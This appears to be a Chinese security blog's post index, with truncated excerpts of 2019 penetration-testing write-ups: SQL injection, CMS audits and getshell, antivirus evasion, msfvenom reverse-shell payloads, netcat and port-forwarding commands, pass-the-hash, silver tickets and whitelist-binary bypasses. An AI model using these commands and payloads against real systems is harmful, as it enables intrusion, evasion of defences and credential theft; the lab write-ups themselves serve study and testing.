- 博客(57)
- 资源 (6)
- 收藏
- 关注
原创 爬某博客
import reimport requestsfrom bs4 import BeautifulSoupimport timerequests.packages.urllib3.disable_warnings()headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \ ...
2019-11-17 22:15:22
296
原创 一次渗透
注入1)网站首页2)简单and 1=1 ,1=2判断注入点3)order by 确定字段数为9,显示位union select 1,2…判断为4和84)判断权限root权限,思考使用into outfile直接写shell或者是外联数据库,使用日志getshell5)into outfile写shell。判断mysql版本为5.5,既必须查看secure-file-priv导...
2019-08-12 22:45:20
803
1
原创 s-cms后台getshell
重装导致任意代码执行代码分析在install.php中判断data/first.txt中值是否为0在后台存在任意txt文件修改(此处不分析代码,系统自带)将0改为任意值再看install.php142-163行将获取到的数据库信息进行连接,当成功后就进行数据库信息写入。此处仅需绕过数据库写入与conn.php文件引号的逃逸。既只用在数据库名处填写3333;#”);phpinf...
2019-08-12 11:05:41
673
原创 特征码简单修改学习
修改字符串大小写法使用C32打开程序,选中然后name小型变为大写等价替换法(相似指令替换)XOR EAX, EAXXOR EAX, EAXJE 10000418改为:XOR EAX, EAXJz 10000418通用跳转法将特征码换到空区域,在跳转回来跳走跳回...
2019-08-09 00:08:23
2536
原创 加花的简单学习
目标getpass1)使用zeroadd进行简单的加区2)使用_LordPE_fix定位加区位置,与文件入口3)使用OD进行简单加花,保存4) 更改入口点5)保存运行6)不科学的过了火绒。。。使用360被报毒...
2019-08-08 01:01:05
251
原创 baiyicms的一次审计
下载安装好后,在admin->controller->file.php文件的edit方法中,使用allowEditor过滤后缀,判断是否可写入跟进函数,发现html,css,js,txt文件可写入下面判断又为false,即可写入html,css,js,txt文件又因为该cms使用了模板引擎加载,既模板的html文件会被渲染为php执行,造成了任意代码执行。漏洞演示:登...
2019-08-04 16:15:51
592
原创 对hsycms的一次审计
非最新版本前台注入在common.php的32行,直接进行sql查询搜索prevNext方法哪里被调用,在show.php的38被调用,可看到传入参数跟进ID,在其第10行跟进input方法使用其方法传参且无过滤,导致ID可控,存在注入。漏洞利用python.exe .\sqlmap.py -u http://q.com/product/132 -D hsycms -T s...
2019-08-02 22:50:39
1281
1
原创 一次简单手工注入
一次简单的手工注入注入点http://xxx/news.php?newsid=18收集了下IP,不能sqlmap了,就只能手工了。1)确定注入点。经典 and 1=1 1=22)简单的order by 确定字段数。一直报错,感觉是被过滤了,后面使用注释符也不行使用union select 1,2,3也报错,确定不了字段数。3)尝试报错注入成功payload:union ...
2019-07-29 21:23:49
323
原创 一次失败的审计
项目地址https://www.douphp.com/DouPHP v1.5 Release 20190711工具:phpstudy+navicat+Seay源代码审计系统+PhpStorm项目目录审计注入首先在product.php的19行,看到使用request接受id与unique_id跟进get_legal_id方法判断ID是否为数字,is_unique_id无法找...
2019-07-22 15:17:34
246
原创 记录一次TP框架开发学习
之前自己看了php基础就去审计,发现很多方法都不知道,审计呢也是审计不出洞,知识还没到位,便去看了TP框架开发,有助于审计的学习。项目地址https://www.php.cn/course/332.html开发工具JetBrains PhpStorm+navicat+phpstudy+tp3.2.3流程简介0X00 tp3.2.3介绍目录index.php 入口文件README...
2019-07-18 16:04:23
260
原创 记一次免杀webshell的工具使用及powershell的编码
原项目地址https://github.com/yzddmr6/webshell-venom简单使用python py.py > test.phpD盾查杀(检验是否免杀的唯一标准)目前仅支持asp.aspx.php。but asp的免杀效果较差。笔者开始使用的是powershell,但是生成的shell并不能使用,后面发现是powershell的编码原因。用ps生成的...
2019-07-16 21:53:37
1538
原创 GreatSCT使用
GreatSCT简介GreatSCT目前得到了@ConsciousHacker的支持,该项目名为Great SCT(Great Scott)。Great SCT是一个用于生成应用程序白名单绕过的开源项目。此工具适用于红队和蓝队。它是一种用来生成Metasploit payload的工具,可绕过常见的防病毒解决方案和应用程序白名单解决方案。项目地址:https://github.com/Grea...
2019-07-11 14:12:02
633
原创 某公众号之图片反弹shell(标题党)
某公众号之图片反弹shell具体公众号猜吧,哈哈哈哈原项目地址https://github.com/peewpw/Invoke-PSImage攻击机 kali 192.168.5.102靶机 win10 192.168.0.311)生成一个msf ps1脚本msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.5....
2019-07-04 13:01:05
818
2
原创 ngrok的使用
ngrok的使用地址http://www.ngrok.cc1)开通隧道2)生成msf payload,使用ngrok的地址与端口生成payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.com LPORT=10842 -f exe> shell.exe3)启动ngrok客户端,msf启动ngrok....
2019-07-02 17:01:42
779
原创 EW使用
EW使用靶机 win7 192.168.5.101攻击机 win 10 192.168.0.31攻击机 kali 192.168.5.1021)ew 自身的各个选项用途说明-l 指定要监听的本地端口-d 指定要反弹到的机器 ip-e 指定要反弹到的机器端口-f 指定要主动连接的机器 ip-g 指定要主动连接的机器端口-t 指定超时时长,默认为 10002)执行正向转发在k...
2019-07-02 15:53:17
8901
原创 portfwd使用
一款内置于msf的工具靶机 win7 192.168.5.101攻击机 win 10 192.168.0.31攻击机 kali 192.168.5.102先配置msf,并反弹会话转发,把win7 3389转发到kali的33333端口portfwd add‐l 33333 ‐r 192.168.5.101 ‐p 3389使用win10 远程桌面功能访问kali的52端口,既访...
2019-07-01 16:23:14
2223
原创 lcx使用
lcx使用win7 192.168.5.101win 10 192.168.0.31kali 192.168.5.102lcx本机: lcx -listen 2222 33332222为转发端口,3333为本机任意未被占用的端口肉鸡:lcx -slave 2.2.2.2 2222 127.0.0.1 33892.2.2.2 为本机IP,2222为转发端口,127.0.0.1为肉鸡内...
2019-07-01 16:03:39
756
1
原创 NC使用
NC使用win7 192.168.5.101win 10 192.168.0.31kali 192.168.5.102传文件win 7 接受(要先启动)nc -lp 52 >3.txtwin10传送nc -nv 192.168.5.101 52 < 3.txt弹shellkali 先启动nc -vv -l -p 52win 10nc 192....
2019-07-01 16:02:21
268
原创 office简单钓鱼与cve2017-11882
office简单钓鱼与cve2017-11882cve2017-11882靶机 windows07攻击机 kali1)先下载msf payload与py生成的wordmsf payloadhttps://github.com/0x09AL/CVE-2017-11882-metasploit路径cve_2017_11882.rb 放在usr/share/metasploit-fra...
2019-06-28 15:26:23
574
原创 winodws计划任务
权限维持-windows计划任务目录0x00 靶机0x01 实战0x02 问题0X00 靶机windows 2K3IP 192.168.5.187账户密码 administrator 1234560x01实战A1)本机win+r打开远程桌面连接,输入靶机地址192.168.5.187,并输入账户密码登录2)点击右下角的开始-控制面板-任务计划3)任务计划向导,下一步...
2019-06-27 15:16:56
279
原创 smb中继攻击
简单来说就是中间人攻击,窃取凭证这里简单示范攻击机kali 192.168.5.102靶机 win7192.168.5.155kali配置如下靶机执行dir \\192.168.5.102\c$无法弹回shell,不知道为什么,但已能获取到hash。即可pth利用较简单,重点是如何进行欺骗。...
2019-06-13 15:41:37
1179
1
原创 域渗透之银票据学习
银票据(silver ticket):它不需要和域控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。0x01 银票据利用条件域控计算机账户的ntlm hash域中的sid值一台域中主机与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限。0x02 实战环境域控2k3,ip:192.168.5...
2019-06-10 14:12:52
1132
原创 python学习之exp整合
python学习之exp整合将上述的三个exp利用脚本整合为一个,简单的cms漏洞识别利用功能使用方法python demo.py "url"# -*- coding:utf-8 -*-import urllibimport urllib.requestimport requestsimport osimport hashlib#import test.pyimport ...
2019-06-10 10:45:28
1008
原创 python学习之ecshop exp编写
python学习之ecshop exp编写针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。# -*- coding:utf-8 -*-import requestsimport timedef ecshop(url): time.sleep(5) url_exp=url+"/user.php" a = "554fcae493e564ee0dc7...
2019-06-04 22:56:49
540
原创 内网渗透之PTH
PTH (pass-the-hash)pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。pass the hash原理:在Windows系统中,通常会使用NTLM身份认证NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonU...
2019-06-03 15:34:27
3298
原创 python学习之phpcms exp编写
python学习之phpcms exp编写针对phpcms v9.6 前台注册getshell exp编写,漏洞分析请查看网上分析,不再赘述。# -*- coding:utf-8 -*-import reimport stringimport requestsimport randomimport timedef getshell(host): try: ...
2019-05-28 15:50:17
569
原创 python学习之dedecms exp编写
python学习之dedecms exp编写针对织梦5.7 sp1远程文件包含getshell exp编写,漏洞分析请查看网上分析,不再赘述。exp# -*- coding:utf-8 -*-import requestsimport timedef dada(url): url_index=url+"/install/index.php" headers = {"...
2019-05-24 09:54:09
783
原创 帝国cms7.5漏洞复现
EmpireCMS v7.5后台任意代码执行分析目录一.漏洞简介二.漏洞复现三.原理分析一.漏洞简介EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。[影响版本] <=7.5[漏洞危害] 高[漏洞位置] /e/admin/admin/ebak/phome.php二.漏洞复现1 访问靶机192.168...
2019-05-10 15:56:10
25497
7
原创 对亮神基于白名单zipfldr.dll执行payload第十八季复现
0x00 zipfldr.dll简介:zipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。0x01 环境攻击机 kali 192.168.5.102靶机 win7 192.168.5.101装有av0x02复现攻击机靶机rundll32.exe zipfldr.dll,RouteTheCall shellcode.exe弹回0x03 sh...
2019-05-06 22:17:39
346
原创 对亮神基于白名单Url.dll执行payload第十七季复现
0x00 Url.dll简介:url.dll是Internet快捷壳扩展相关应用程序接口系统文件。攻击机: 192.168.5.100 kali靶机: 192.168.5.157 Windows 7
2019-05-06 22:07:24
382
原创 对亮神基于白名单ftp执行payload第十九季复现
0x00 Ftp.exe简介:Ftp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。0x01 环境攻击机 kali 192.168.5.102靶机 win7 192.168.5.101装有av0x02复现攻击机,注意配置set AutoRunScript migrate f靶机echo !C:\Users\administrator\Des...
2019-05-06 22:03:29
343
原创 对亮神基于白名单Pcalua执行payload第十五季复现
0x00 Pcalua 简介:Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。0x01 环境攻击机 kali 192.168.5.100靶机 win7 192.168.5.101装有av0x02复现攻击机靶机shell弹回0x03 shellcode.exemsfvenom -a x86 --platfor...
2019-05-06 12:46:25
331
原创 对亮神基于白名单Forfiles 执行 payload 第十四季复现
0x00 Forfiles简介:Forfiles为Windows默认安装的文件操作搜索工具之一,可根据日期,后缀名,修改日期为条件。常与批处理配合使用。0x01 环境攻击机 kali 192.168.5.100靶机 win7 192.168.5.101装有av0x02复现攻击机靶机forfiles /p c:\windows\system32 /m cmd.exe /c ...
2019-05-06 12:26:20
318
原创 对亮神基于白名单 PsExec 执行 payload 第十三季复现
0x00 PsExec 简介:微软于2006年7月收购sysinternals公司,PsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性0x01 环境攻击机 kali 192.168.5.100靶机 win7 192.1...
2019-05-06 12:09:04
390
原创 对亮神基于白名单Wmic 执行 payload 第十季复现
0x01 Wmic简介:WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之...
2019-05-03 21:06:53
482
原创 对亮神基于白名单Regsvr32 执行 payload 第九季复现
0x00 Regsvr32简介:Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。WinXP及以上系统的regsvr32.exe在windows\system32文件夹下;2000系统的regsvr32.exe在winnt\system32文件夹下。但搭配regsvr32.exe使用的 DLL,需要提供 DllRegis...
2019-05-03 19:57:54
635
原创 对亮神基于白名单 Msiexec 执行 Payload 第八季复现
0x00 Msiexec 简介Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 2003,Windows 7等0x01 环境攻击机kali 192.168.5.99靶机win7 192.168.5.112...
2019-05-03 19:26:57
418
Cobalt Strike下载
2019-04-09
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人